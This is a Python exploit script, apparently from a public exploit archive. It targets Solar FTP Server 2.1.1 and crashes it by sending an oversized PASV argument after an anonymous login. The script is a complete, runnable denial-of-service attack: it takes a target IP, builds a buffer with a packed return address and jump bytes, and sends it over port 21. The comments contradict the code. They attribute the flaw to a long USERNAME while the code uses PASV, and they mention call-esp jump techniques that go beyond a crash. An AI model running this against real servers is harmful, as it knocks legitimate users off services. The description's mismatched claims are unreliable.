#!/usr/bin/python # Exploit Title: Solar FTP Server 2.1.1 PASV Command - Denial of Service (DoS) # Discovery by: Fernando Mengali # Discovery Date: 31 january 2024 # Vendor Homepage: N/A # Download to demo: # Notification vendor: No reported # Tested Version: Solar FTP Server 2.1.1 # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Denial of Service (DoS) # Vídeo: #1. Description #His technique works fine against Windows XP Professional Service Pack 2 and 3 (English). #For this exploit I have tried several strategies to increase reliability and performance: #Jump to a static 'call esp' #Backwards jump to code a known distance from the stack pointer. #The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user. #When authenticating to the FTP server with a long USERNAME or a USERNAME with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions. #Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users. import socket,sys,time,struct if len(sys.argv) < 2: print("[-]Usage: %s <ip addr> " % sys.argv[0]) sys.exit(0) ip = sys.argv[1] if len(sys.argv) > 2: platform = sys.argv[2] ret = struct.pack('<L', 0x7C9572D8) #works when the server is on 192.168.133.128 padding = b"\x43" * 468 junk = b"\x43" * 1532 frontpad = b"\x41" * 100 + b"\xeb\x30" + b"\x41" * 21 payload = frontpad + ret + padding + junk print ("[+] Solar FTP 2.1.1 PASV - Denied of Service - DoS \n[+] Author: Fernando Mengali\n") print ("[+] Connecting to "+ip) s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect((ip,21)) except: print("[-] Connection to "+ip+" failed!") sys.exit(0) print ("[+] Exploiting") print("[*] Sending payload to command PASV...") s.send(b"USER anon\r\n") s.recv(1024) s.send(b"PASS anon\r\n") s.recv(1024) s.send(b"PASV " + payload + b"\r\n") print("[+] Done - Exploited")